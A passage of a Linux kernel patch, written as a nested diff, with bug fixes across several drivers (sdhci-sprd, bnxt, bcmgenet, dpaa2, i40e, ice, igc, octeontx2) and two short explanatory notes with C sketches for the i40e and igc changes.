++	val = sdhci_readl(host, SDHCI_SPRD_REG_32_BUSY_POSI);
++	mask = SDHCI_SPRD_BIT_OUTR_CLK_AUTO_EN | SDHCI_SPRD_BIT_INNR_CLK_AUTO_EN;
+ 	/* Enable CLK_AUTO when the clock is greater than 400K. */
+ 	if (clk > 400000) {
+-		val = sdhci_readl(host, SDHCI_SPRD_REG_32_BUSY_POSI);
+-		mask = SDHCI_SPRD_BIT_OUTR_CLK_AUTO_EN |
+-			SDHCI_SPRD_BIT_INNR_CLK_AUTO_EN;
+ 		if (mask != (val & mask)) {
+ 			val |= mask;
+ 			sdhci_writel(host, val, SDHCI_SPRD_REG_32_BUSY_POSI);
+ 		}
++	} else {
++		if (val & mask) {
++			val &= ~mask;
++			sdhci_writel(host, val, SDHCI_SPRD_REG_32_BUSY_POSI);
++		}
+ 	}
+ }
+ 
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index 623cdeb29ed90..df4d88d35701b 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -12081,6 +12081,8 @@ static void bnxt_sp_task(struct work_struct *work)
+ 		bnxt_cfg_ntp_filters(bp);
+ 	if (test_and_clear_bit(BNXT_HWRM_EXEC_FWD_REQ_SP_EVENT, &bp->sp_event))
+ 		bnxt_hwrm_exec_fwd_req(bp);
++	if (test_and_clear_bit(BNXT_HWRM_PF_UNLOAD_SP_EVENT, &bp->sp_event))
++		netdev_info(bp->dev, "Receive PF driver unload event!\n");
+ 	if (test_and_clear_bit(BNXT_PERIODIC_STATS_SP_EVENT, &bp->sp_event)) {
+ 		bnxt_hwrm_port_qstats(bp, 0);
+ 		bnxt_hwrm_port_qstats_ext(bp, 0);
+@@ -13059,8 +13061,6 @@ static void bnxt_cfg_ntp_filters(struct bnxt *bp)
+ 			}
+ 		}
+ 	}
+-	if (test_and_clear_bit(BNXT_HWRM_PF_UNLOAD_SP_EVENT, &bp->sp_event))
+-		netdev_info(bp->dev, "Receive PF driver unload event!\n");
+ }
+ 
+ #else
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmgenet.c b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+index 1ae082eb9e905..c2a9913082153 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmgenet.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+@@ -2131,8 +2131,10 @@ static netdev_tx_t bcmgenet_xmit(struct sk_buff *skb, struct net_device *dev)
+ 		/* Note: if we ever change from DMA_TX_APPEND_CRC below we
+ 		 * will need to restore software padding of "runt" packets
+ 		 */
++		len_stat |= DMA_TX_APPEND_CRC;
++
+ 		if (!i) {
+-			len_stat |= DMA_TX_APPEND_CRC | DMA_SOP;
++			len_stat |= DMA_SOP;
+ 			if (skb->ip_summed == CHECKSUM_PARTIAL)
+ 				len_stat |= DMA_TX_DO_CSUM;
+ 		}
+diff --git a/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c b/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c
+index b58162ce81d87..de62eee58a00e 100644
+--- a/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c
++++ b/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c
+@@ -509,8 +509,6 @@ static struct sk_buff *dpaa2_eth_copybreak(struct dpaa2_eth_channel *ch,
+ 
+ 	memcpy(skb->data, fd_vaddr + fd_offset, fd_length);
+ 
+-	dpaa2_eth_recycle_buf(priv, ch, dpaa2_fd_get_addr(fd));
+-
+ 	return skb;
+ }
+ 
+@@ -528,6 +526,7 @@ static void dpaa2_eth_rx(struct dpaa2_eth_priv *priv,
+ 	struct dpaa2_eth_drv_stats *percpu_extras;
+ 	struct device *dev = priv->net_dev->dev.parent;
+ 	struct dpaa2_fas *fas;
++	bool recycle_rx_buf = false;
+ 	void *buf_data;
+ 	u32 status = 0;
+ 	u32 xdp_act;
+@@ -560,6 +559,8 @@ static void dpaa2_eth_rx(struct dpaa2_eth_priv *priv,
+ 			dma_unmap_page(dev, addr, priv->rx_buf_size,
+ 				       DMA_BIDIRECTIONAL);
+ 			skb = dpaa2_eth_build_linear_skb(ch, fd, vaddr);
++		} else {
++			recycle_rx_buf = true;
+ 		}
+ 	} else if (fd_format == dpaa2_fd_sg) {
+ 		WARN_ON(priv->xdp_prog);
+@@ -607,6 +608,8 @@ static void dpaa2_eth_rx(struct dpaa2_eth_priv *priv,
+ 
+ 	list_add_tail(&skb->list, ch->rx_list);
+ 
++	if (recycle_rx_buf)
++		dpaa2_eth_recycle_buf(priv, ch, dpaa2_fd_get_addr(fd));
+ 	return;
+ 
+ err_build_skb:
+diff --git a/drivers/net/ethernet/freescale/dpaa2/dpaa2-ethtool.c b/drivers/net/ethernet/freescale/dpaa2/dpaa2-ethtool.c
+index eea7d7a07c007..59888826469b9 100644
+--- a/drivers/net/ethernet/freescale/dpaa2/dpaa2-ethtool.c
++++ b/drivers/net/ethernet/freescale/dpaa2/dpaa2-ethtool.c
+@@ -227,17 +227,8 @@ static void dpaa2_eth_get_ethtool_stats(struct net_device *net_dev,
+ 					struct ethtool_stats *stats,
+ 					u64 *data)
+ {
+-	int i = 0;
+-	int j, k, err;
+-	int num_cnt;
+-	union dpni_statistics dpni_stats;
+-	u32 fcnt, bcnt;
+-	u32 fcnt_rx_total = 0, fcnt_tx_total = 0;
+-	u32 bcnt_rx_total = 0, bcnt_tx_total = 0;
+-	u32 buf_cnt;
+ 	struct dpaa2_eth_priv *priv = netdev_priv(net_dev);
+-	struct dpaa2_eth_drv_stats *extras;
+-	struct dpaa2_eth_ch_stats *ch_stats;
++	union dpni_statistics dpni_stats;
+ 	int dpni_stats_page_size[DPNI_STATISTICS_CNT] = {
+ 		sizeof(dpni_stats.page_0),
+ 		sizeof(dpni_stats.page_1),
+@@ -247,6 +238,13 @@ static void dpaa2_eth_get_ethtool_stats(struct net_device *net_dev,
+ 		sizeof(dpni_stats.page_5),
+ 		sizeof(dpni_stats.page_6),
+ 	};
++	u32 fcnt_rx_total = 0, fcnt_tx_total = 0;
++	u32 bcnt_rx_total = 0, bcnt_tx_total = 0;
++	struct dpaa2_eth_ch_stats *ch_stats;
++	struct dpaa2_eth_drv_stats *extras;
++	int j, k, err, num_cnt, i = 0;
++	u32 fcnt, bcnt;
++	u32 buf_cnt;
+ 
+ 	memset(data, 0,
+ 	       sizeof(u64) * (DPAA2_ETH_NUM_STATS + DPAA2_ETH_NUM_EXTRA_STATS));
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index b4157ff370a31..63d43ef86f9b9 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -104,12 +104,18 @@ static struct workqueue_struct *i40e_wq;
+ static void netdev_hw_addr_refcnt(struct i40e_mac_filter *f,
+ 				  struct net_device *netdev, int delta)
+ {
++	struct netdev_hw_addr_list *ha_list;
+ 	struct netdev_hw_addr *ha;
+ 
+ 	if (!f || !netdev)
+ 		return;
+ 
+-	netdev_for_each_mc_addr(ha, netdev) {
++	if (is_unicast_ether_addr(f->macaddr) || is_link_local_ether_addr(f->macaddr))
++		ha_list = &netdev->uc;
++	else
++		ha_list = &netdev->mc;
++
++	netdev_hw_addr_list_for_each(ha, ha_list) {
+ 		if (ether_addr_equal(ha->addr, f->macaddr)) {
+ 			ha->refcount += delta;
+ 			if (ha->refcount <= 0)
+@@ -16444,6 +16450,9 @@ static void i40e_pci_error_reset_done(struct pci_dev *pdev)
+ 		return;
+ 
+ 	i40e_reset_and_rebuild(pf, false, false);
++#ifdef CONFIG_PCI_IOV
++	i40e_restore_all_vfs_msi_state(pdev);
++#endif /* CONFIG_PCI_IOV */
+ }
+ 
+ /**
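(The refcount fix selects the address list that can actually hold the filter's MAC
instead of always walking netdev->mc. The selection rule as a standalone sketch,
with a hypothetical helper name:

static struct netdev_hw_addr_list *
addr_list_for(struct net_device *netdev, const u8 *mac)
{
	if (is_unicast_ether_addr(mac) || is_link_local_ether_addr(mac))
		return &netdev->uc;
	return &netdev->mc;
}
)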
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+index cb925baf72ce0..c7d761426d6ce 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+@@ -152,6 +152,32 @@ void i40e_vc_notify_reset(struct i40e_pf *pf)
+ 			     (u8 *)&pfe, sizeof(struct virtchnl_pf_event));
+ }
+ 
++#ifdef CONFIG_PCI_IOV
++void i40e_restore_all_vfs_msi_state(struct pci_dev *pdev)
++{
++	u16 vf_id;
++	u16 pos;
++
++	/* Continue only if this is a PF */
++	if (!pdev->is_physfn)
++		return;
++
++	if (!pci_num_vf(pdev))
++		return;
++
++	pos = pci_find_ext_capability(pdev, PCI_EXT_CAP_ID_SRIOV);
++	if (pos) {
++		struct pci_dev *vf_dev = NULL;
++
++		pci_read_config_word(pdev, pos + PCI_SRIOV_VF_DID, &vf_id);
++		while ((vf_dev = pci_get_device(pdev->vendor, vf_id, vf_dev))) {
++			if (vf_dev->is_virtfn && vf_dev->physfn == pdev)
++				pci_restore_msi_state(vf_dev);
++		}
++	}
++}
++#endif /* CONFIG_PCI_IOV */
++
+ /**
+  * i40e_vc_notify_vf_reset
+  * @vf: pointer to the VF structure
+@@ -3451,16 +3477,16 @@ static int i40e_validate_cloud_filter(struct i40e_vf *vf,
+ 	bool found = false;
+ 	int bkt;
+ 
+-	if (!tc_filter->action) {
++	if (tc_filter->action != VIRTCHNL_ACTION_TC_REDIRECT) {
+ 		dev_info(&pf->pdev->dev,
+-			 "VF %d: Currently ADq doesn't support Drop Action\n",
+-			 vf->vf_id);
++			 "VF %d: ADQ doesn't support this action (%d)\n",
++			 vf->vf_id, tc_filter->action);
+ 		goto err;
+ 	}
+ 
+ 	/* action_meta is TC number here to which the filter is applied */
+ 	if (!tc_filter->action_meta ||
+-	    tc_filter->action_meta > I40E_MAX_VF_VSI) {
++	    tc_filter->action_meta > vf->num_tc) {
+ 		dev_info(&pf->pdev->dev, "VF %d: Invalid TC number %u\n",
+ 			 vf->vf_id, tc_filter->action_meta);
+ 		goto err;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.h b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.h
+index 358bbdb587951..bd497cc5303a1 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.h
+@@ -135,6 +135,9 @@ int i40e_ndo_set_vf_spoofchk(struct net_device *netdev, int vf_id, bool enable);
+ 
+ void i40e_vc_notify_link_state(struct i40e_pf *pf);
+ void i40e_vc_notify_reset(struct i40e_pf *pf);
++#ifdef CONFIG_PCI_IOV
++void i40e_restore_all_vfs_msi_state(struct pci_dev *pdev);
++#endif /* CONFIG_PCI_IOV */
+ int i40e_get_vf_stats(struct net_device *netdev, int vf_id,
+ 		      struct ifla_vf_stats *vf_stats);
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index f0f39364819ac..ab46cfca4028d 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -2138,7 +2138,7 @@ static int ice_configure_phy(struct ice_vsi *vsi)
+ 
+ 	/* Ensure we have media as we cannot configure a medialess port */
+ 	if (!(phy->link_info.link_info & ICE_AQ_MEDIA_AVAILABLE))
+-		return -EPERM;
++		return -ENOMEDIUM;
+ 
+ 	ice_print_topo_conflict(vsi);
+ 
+@@ -9065,8 +9065,14 @@ int ice_stop(struct net_device *netdev)
+ 		int link_err = ice_force_phys_link_state(vsi, false);
+ 
+ 		if (link_err) {
+-			netdev_err(vsi->netdev, "Failed to set physical link down, VSI %d error %d\n",
+-				   vsi->vsi_num, link_err);
++			if (link_err == -ENOMEDIUM)
++				netdev_info(vsi->netdev, "Skipping link reconfig - no media attached, VSI %d\n",
++					    vsi->vsi_num);
++			else
++				netdev_err(vsi->netdev, "Failed to set physical link down, VSI %d error %d\n",
++					   vsi->vsi_num, link_err);
++
++			ice_vsi_close(vsi);
+ 			return -EIO;
+ 		}
+ 	}
+diff --git a/drivers/net/ethernet/intel/igc/igc.h b/drivers/net/ethernet/intel/igc/igc.h
+index 43c05b41627f7..2a894ca49d93b 100644
+--- a/drivers/net/ethernet/intel/igc/igc.h
++++ b/drivers/net/ethernet/intel/igc/igc.h
+@@ -538,6 +538,7 @@ struct igc_nfc_filter {
+ 	u16 etype;
+ 	__be16 vlan_etype;
+ 	u16 vlan_tci;
++	u16 vlan_tci_mask;
+ 	u8 src_addr[ETH_ALEN];
+ 	u8 dst_addr[ETH_ALEN];
+ 	u8 user_data[8];
+diff --git a/drivers/net/ethernet/intel/igc/igc_ethtool.c b/drivers/net/ethernet/intel/igc/igc_ethtool.c
+index 81897f7a90a91..2bee9cace5983 100644
+--- a/drivers/net/ethernet/intel/igc/igc_ethtool.c
++++ b/drivers/net/ethernet/intel/igc/igc_ethtool.c
+@@ -957,6 +957,7 @@ static int igc_ethtool_set_coalesce(struct net_device *netdev,
+ }
+ 
+ #define ETHER_TYPE_FULL_MASK ((__force __be16)~0)
++#define VLAN_TCI_FULL_MASK ((__force __be16)~0)
+ static int igc_ethtool_get_nfc_rule(struct igc_adapter *adapter,
+ 				    struct ethtool_rxnfc *cmd)
+ {
+@@ -979,10 +980,16 @@ static int igc_ethtool_get_nfc_rule(struct igc_adapter *adapter,
+ 		fsp->m_u.ether_spec.h_proto = ETHER_TYPE_FULL_MASK;
+ 	}
+ 
++	if (rule->filter.match_flags & IGC_FILTER_FLAG_VLAN_ETYPE) {
++		fsp->flow_type |= FLOW_EXT;
++		fsp->h_ext.vlan_etype = rule->filter.vlan_etype;
++		fsp->m_ext.vlan_etype = ETHER_TYPE_FULL_MASK;
++	}
++
+ 	if (rule->filter.match_flags & IGC_FILTER_FLAG_VLAN_TCI) {
+ 		fsp->flow_type |= FLOW_EXT;
+ 		fsp->h_ext.vlan_tci = htons(rule->filter.vlan_tci);
+-		fsp->m_ext.vlan_tci = htons(VLAN_PRIO_MASK);
++		fsp->m_ext.vlan_tci = htons(rule->filter.vlan_tci_mask);
+ 	}
+ 
+ 	if (rule->filter.match_flags & IGC_FILTER_FLAG_DST_MAC_ADDR) {
+@@ -1217,6 +1224,7 @@ static void igc_ethtool_init_nfc_rule(struct igc_nfc_rule *rule,
+ 
+ 	if ((fsp->flow_type & FLOW_EXT) && fsp->m_ext.vlan_tci) {
+ 		rule->filter.vlan_tci = ntohs(fsp->h_ext.vlan_tci);
++		rule->filter.vlan_tci_mask = ntohs(fsp->m_ext.vlan_tci);
+ 		rule->filter.match_flags |= IGC_FILTER_FLAG_VLAN_TCI;
+ 	}
+ 
+@@ -1254,11 +1262,19 @@ static void igc_ethtool_init_nfc_rule(struct igc_nfc_rule *rule,
+ 		memcpy(rule->filter.user_mask, fsp->m_ext.data, sizeof(fsp->m_ext.data));
+ 	}
+ 
+-	/* When multiple filter options or user data or vlan etype is set, use a
+-	 * flex filter.
++	/* The i225/i226 supports several types of filters. Flex filters provide a
++	 * way to match up to the first 128 bytes of a packet. Use them for:
++	 *   a) For specific user data
++	 *   b) For VLAN EtherType
++	 *   c) For full TCI match
++	 *   d) Or in case multiple filter criteria are set
++	 *
++	 * Otherwise, use the simple MAC, VLAN PRIO or EtherType filters.
+ 	 */
+ 	if ((rule->filter.match_flags & IGC_FILTER_FLAG_USER_DATA) ||
+ 	    (rule->filter.match_flags & IGC_FILTER_FLAG_VLAN_ETYPE) ||
++	    ((rule->filter.match_flags & IGC_FILTER_FLAG_VLAN_TCI) &&
++	     rule->filter.vlan_tci_mask == ntohs(VLAN_TCI_FULL_MASK)) ||
+ 	    (rule->filter.match_flags & (rule->filter.match_flags - 1)))
+ 		rule->flex = true;
+ 	else
+@@ -1328,6 +1344,26 @@ static int igc_ethtool_add_nfc_rule(struct igc_adapter *adapter,
+ 		return -EINVAL;
+ 	}
+ 
++	/* There are two ways to match the VLAN TCI:
++	 *  1. Match on PCP field and use vlan prio filter for it
++	 *  2. Match on complete TCI field and use flex filter for it
++	 */
++	if ((fsp->flow_type & FLOW_EXT) &&
++	    fsp->m_ext.vlan_tci &&
++	    fsp->m_ext.vlan_tci != htons(VLAN_PRIO_MASK) &&
++	    fsp->m_ext.vlan_tci != VLAN_TCI_FULL_MASK) {
++		netdev_dbg(netdev, "VLAN mask not supported\n");
++		return -EOPNOTSUPP;
++	}
++
++	/* VLAN EtherType can only be matched by full mask. */
++	if ((fsp->flow_type & FLOW_EXT) &&
++	    fsp->m_ext.vlan_etype &&
++	    fsp->m_ext.vlan_etype != ETHER_TYPE_FULL_MASK) {
++		netdev_dbg(netdev, "VLAN EtherType mask not supported\n");
++		return -EOPNOTSUPP;
++	}
++
+ 	if (fsp->location >= IGC_MAX_RXNFC_RULES) {
+ 		netdev_dbg(netdev, "Invalid location\n");
+ 		return -EINVAL;
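(Taken together, the two checks above accept exactly two TCI masks: PCP-only
(VLAN_PRIO_MASK, handled by the priority filter) and a full mask (handled by a flex
filter). A sketch of the policy; note VLAN_TCI_FULL_MASK is already a big-endian
all-ones value, so only the PCP mask needs htons():

static int igc_check_tci_mask(__be16 mask)
{
	if (!mask ||				/* TCI not matched */
	    mask == htons(VLAN_PRIO_MASK) ||	/* PCP only: prio filter */
	    mask == (__force __be16)~0)		/* full TCI: flex filter */
		return 0;
	return -EOPNOTSUPP;
}
)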
+diff --git a/drivers/net/ethernet/intel/igc/igc_tsn.c b/drivers/net/ethernet/intel/igc/igc_tsn.c
+index 725db36e399d2..31ea0781b65ec 100644
+--- a/drivers/net/ethernet/intel/igc/igc_tsn.c
++++ b/drivers/net/ethernet/intel/igc/igc_tsn.c
+@@ -178,7 +178,7 @@ static int igc_tsn_enable_offload(struct igc_adapter *adapter)
+ 			wr32(IGC_TQAVCC(i), tqavcc);
+ 
+ 			wr32(IGC_TQAVHC(i),
+-			     0x80000000 + ring->hicredit * 0x7735);
++			     0x80000000 + ring->hicredit * 0x7736);
+ 		} else {
+ 			/* Disable any CBS for the queue */
+ 			txqctl &= ~(IGC_TXQCTL_QAV_SEL_MASK);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+index 65c0373d34d12..90be87dc105d3 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+@@ -78,7 +78,7 @@ static bool is_dev_rpm(void *cgxd)
+ 
+ bool is_lmac_valid(struct cgx *cgx, int lmac_id)
+ {
+-	if (!cgx || lmac_id < 0 || lmac_id >= MAX_LMAC_PER_CGX)
++	if (!cgx || lmac_id < 0 || lmac_id >= cgx->max_lmac_per_mac)
+ 		return false;
+ 	return test_bit(lmac_id, &cgx->lmac_bmap);
+ }
+@@ -90,7 +90,7 @@ static int get_sequence_id_of_lmac(struct cgx *cgx, int lmac_id)
+ {
+ 	int tmp, id = 0;
+ 
+-	for_each_set_bit(tmp, &cgx->lmac_bmap, MAX_LMAC_PER_CGX) {
++	for_each_set_bit(tmp, &cgx->lmac_bmap, cgx->max_lmac_per_mac) {
+ 		if (tmp == lmac_id)
+ 			break;
+ 		id++;
+@@ -121,7 +121,7 @@ u64 cgx_read(struct cgx *cgx, u64 lmac, u64 offset)
+ 
+ struct lmac *lmac_pdata(u8 lmac_id, struct cgx *cgx)
+ {
+-	if (!cgx || lmac_id >= MAX_LMAC_PER_CGX)
++	if (!cgx || lmac_id >= cgx->max_lmac_per_mac)
+ 		return NULL;
+ 
+ 	return cgx->lmac_idmap[lmac_id];
+@@ -1410,7 +1410,7 @@ int cgx_get_fwdata_base(u64 *base)
+ 	if (!cgx)
+ 		return -ENXIO;
+ 
+-	first_lmac = find_first_bit(&cgx->lmac_bmap, MAX_LMAC_PER_CGX);
++	first_lmac = find_first_bit(&cgx->lmac_bmap, cgx->max_lmac_per_mac);
+ 	req = FIELD_SET(CMDREG_ID, CGX_CMD_GET_FWD_BASE, req);
+ 	err = cgx_fwi_cmd_generic(req, &resp, cgx, first_lmac);
+ 	if (!err)
+@@ -1499,7 +1499,7 @@ static int cgx_fwi_link_change(struct cgx *cgx, int lmac_id, bool enable)
+ 
+ static inline int cgx_fwi_read_version(u64 *resp, struct cgx *cgx)
+ {
+-	int first_lmac = find_first_bit(&cgx->lmac_bmap, MAX_LMAC_PER_CGX);
++	int first_lmac = find_first_bit(&cgx->lmac_bmap, cgx->max_lmac_per_mac);
+ 	u64 req = 0;
+ 
+ 	req = FIELD_SET(CMDREG_ID, CGX_CMD_GET_FW_VER, req);
+@@ -1537,7 +1537,7 @@ static void cgx_lmac_linkup_work(struct work_struct *work)
+ 	int i, err;
+ 
+ 	/* Do Link up for all the enabled lmacs */
+-	for_each_set_bit(i, &cgx->lmac_bmap, MAX_LMAC_PER_CGX) {
++	for_each_set_bit(i, &cgx->lmac_bmap, cgx->max_lmac_per_mac) {
+ 		err = cgx_fwi_link_change(cgx, i, true);
+ 		if (err)
+ 			dev_info(dev, "cgx port %d:%d Link up command failed\n",
+@@ -1557,14 +1557,6 @@ int cgx_lmac_linkup_start(void *cgxd)
+ 	return 0;
+ }
+ 
+-static void cgx_lmac_get_fifolen(struct cgx *cgx)
+-{
+-	u64 cfg;
+-
+-	cfg = cgx_read(cgx, 0, CGX_CONST);
+-	cgx->mac_ops->fifo_len = FIELD_GET(CGX_CONST_RXFIFO_SIZE, cfg);
+-}
+-
+ static int cgx_configure_interrupt(struct cgx *cgx, struct lmac *lmac,
+ 				   int cnt, bool req_free)
+ {
+@@ -1619,17 +1611,14 @@ static int cgx_lmac_init(struct cgx *cgx)
+ 	u64 lmac_list;
+ 	int i, err;
+ 
+-	cgx_lmac_get_fifolen(cgx);
+-
+-	cgx->lmac_count = cgx->mac_ops->get_nr_lmacs(cgx);
+ 	/* lmac_list specifies which lmacs are enabled
+ 	 * when bit n is set to 1, LMAC[n] is enabled
+ 	 */
+ 	if (cgx->mac_ops->non_contiguous_serdes_lane)
+ 		lmac_list = cgx_read(cgx, 0, CGXX_CMRX_RX_LMACS) & 0xFULL;
+ 
+-	if (cgx->lmac_count > MAX_LMAC_PER_CGX)
+-		cgx->lmac_count = MAX_LMAC_PER_CGX;
++	if (cgx->lmac_count > cgx->max_lmac_per_mac)
++		cgx->lmac_count = cgx->max_lmac_per_mac;
+ 
+ 	for (i = 0; i < cgx->lmac_count; i++) {
+ 		lmac = kzalloc(sizeof(struct lmac), GFP_KERNEL);
+@@ -1707,7 +1696,7 @@ static int cgx_lmac_exit(struct cgx *cgx)
+ 	}
+ 
+ 	/* Free all lmac related resources */
+-	for_each_set_bit(i, &cgx->lmac_bmap, MAX_LMAC_PER_CGX) {
++	for_each_set_bit(i, &cgx->lmac_bmap, cgx->max_lmac_per_mac) {
+ 		lmac = cgx->lmac_idmap[i];
+ 		if (!lmac)
+ 			continue;
+@@ -1723,6 +1712,12 @@ static int cgx_lmac_exit(struct cgx *cgx)
+ 
+ static void cgx_populate_features(struct cgx *cgx)
+ {
++	u64 cfg;
++
++	cfg = cgx_read(cgx, 0, CGX_CONST);
++	cgx->mac_ops->fifo_len = FIELD_GET(CGX_CONST_RXFIFO_SIZE, cfg);
++	cgx->max_lmac_per_mac = FIELD_GET(CGX_CONST_MAX_LMACS, cfg);
++
+ 	if (is_dev_rpm(cgx))
+ 		cgx->hw_features = (RVU_LMAC_FEAT_DMACF | RVU_MAC_RPM |
+ 				    RVU_LMAC_FEAT_FC | RVU_LMAC_FEAT_PTP);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/cgx.h b/drivers/net/ethernet/marvell/octeontx2/af/cgx.h
+index 04338db38671b..09ddb00f63cc7 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/cgx.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/cgx.h
+@@ -18,11 +18,8 @@
+ /* PCI BAR nos */
+ #define PCI_CFG_REG_BAR_NUM		0
+ 
+-#define CGX_ID_MASK			0x7
+-#define MAX_LMAC_PER_CGX		4
++#define CGX_ID_MASK			0xF
+ #define MAX_DMAC_ENTRIES_PER_CGX	32
+-#define CGX_FIFO_LEN			65536 /* 64K for both Rx & Tx */
+-#define CGX_OFFSET(x)			((x) * MAX_LMAC_PER_CGX)
+ 
+ /* Registers */
+ #define CGXX_CMRX_CFG			0x00
+@@ -56,6 +53,7 @@
+ #define CGXX_SCRATCH1_REG		0x1058
+ #define CGX_CONST			0x2000
+ #define CGX_CONST_RXFIFO_SIZE	        GENMASK_ULL(23, 0)
++#define CGX_CONST_MAX_LMACS	        GENMASK_ULL(31, 24)
+ #define CGXX_SPUX_CONTROL1		0x10000
+ #define CGXX_SPUX_LNX_FEC_CORR_BLOCKS	0x10700
+ #define CGXX_SPUX_LNX_FEC_UNCORR_BLOCKS	0x10800
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/lmac_common.h b/drivers/net/ethernet/marvell/octeontx2/af/lmac_common.h
+index 52b6016789fa4..697cfec74aa1e 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/lmac_common.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/lmac_common.h
+@@ -128,7 +128,10 @@ struct cgx {
+ 	struct pci_dev		*pdev;
+ 	u8			cgx_id;
+ 	u8			lmac_count;
+-	struct lmac		*lmac_idmap[MAX_LMAC_PER_CGX];
++	/* number of LMACs per MAC could be 4 or 8 */
++	u8			max_lmac_per_mac;
++#define MAX_LMAC_COUNT		8
++	struct lmac             *lmac_idmap[MAX_LMAC_COUNT];
+ 	struct			work_struct cgx_cmd_work;
+ 	struct			workqueue_struct *cgx_cmd_workq;
+ 	struct list_head	cgx_list;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/npc.h b/drivers/net/ethernet/marvell/octeontx2/af/npc.h
+index d027c23b8ef8e..aaff91bc7415a 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/npc.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/npc.h
+@@ -514,7 +514,7 @@ struct npc_lt_def {
+ 	u8	ltype_mask;
+ 	u8	ltype_match;
+ 	u8	lid;
+-};
++} __packed;
+ 
+ struct npc_lt_def_ipsec {
+ 	u8	ltype_mask;
+@@ -522,7 +522,7 @@ struct npc_lt_def_ipsec {
+ 	u8	lid;
+ 	u8	spi_offset;
+ 	u8	spi_nz;
+-};
++} __packed;
+ 
+ struct npc_lt_def_apad {
+ 	u8	ltype_mask;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rpm.c b/drivers/net/ethernet/marvell/octeontx2/af/rpm.c
+index a70e1153fa04b..6b4792a942d84 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rpm.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rpm.c
+@@ -283,6 +283,11 @@ void rpm_lmac_pause_frm_config(void *rpmd, int lmac_id, bool enable)
+ 	cfg = FIELD_SET(RPM_PFC_CLASS_MASK, 0, cfg);
+ 	rpm_write(rpm, lmac_id, RPMX_CMRX_PRT_CBFC_CTL, cfg);
+ 
++	/* Disable forward pause to driver */
++	cfg = rpm_read(rpm, lmac_id, RPMX_MTI_MAC100X_COMMAND_CONFIG);
++	cfg &= ~RPMX_MTI_MAC100X_COMMAND_CONFIG_PAUSE_FWD;
++	rpm_write(rpm, lmac_id, RPMX_MTI_MAC100X_COMMAND_CONFIG, cfg);
++
+ 	/* Enable channel mask for all LMACS */
+ 	rpm_write(rpm, 0, RPMX_CMR_CHAN_MSK_OR, ~0ULL);
+ }
+@@ -451,12 +456,10 @@ int rpm_lmac_pfc_config(void *rpmd, int lmac_id, u8 tx_pause, u8 rx_pause, u16 p
+ 
+ 	if (rx_pause) {
+ 		cfg &= ~(RPMX_MTI_MAC100X_COMMAND_CONFIG_RX_P_DISABLE |
+-				RPMX_MTI_MAC100X_COMMAND_CONFIG_PAUSE_IGNORE |
+-				RPMX_MTI_MAC100X_COMMAND_CONFIG_PAUSE_FWD);
++			 RPMX_MTI_MAC100X_COMMAND_CONFIG_PAUSE_IGNORE);
+ 	} else {
+ 		cfg |= (RPMX_MTI_MAC100X_COMMAND_CONFIG_RX_P_DISABLE |
+-				RPMX_MTI_MAC100X_COMMAND_CONFIG_PAUSE_IGNORE |
+-				RPMX_MTI_MAC100X_COMMAND_CONFIG_PAUSE_FWD);
++			RPMX_MTI_MAC100X_COMMAND_CONFIG_PAUSE_IGNORE);
+ 	}
+ 
+ 	if (tx_pause) {
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+index 95a7bc396e8ea..0b76dfa979d4e 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+@@ -480,7 +480,7 @@ struct rvu {
+ 	u8			cgx_mapped_pfs;
+ 	u8			cgx_cnt_max;	 /* CGX port count max */
+ 	u8			*pf2cgxlmac_map; /* pf to cgx_lmac map */
+-	u16			*cgxlmac2pf_map; /* bitmap of mapped pfs for
++	u64			*cgxlmac2pf_map; /* bitmap of mapped pfs for
+ 						  * every cgx lmac port
+ 						  */
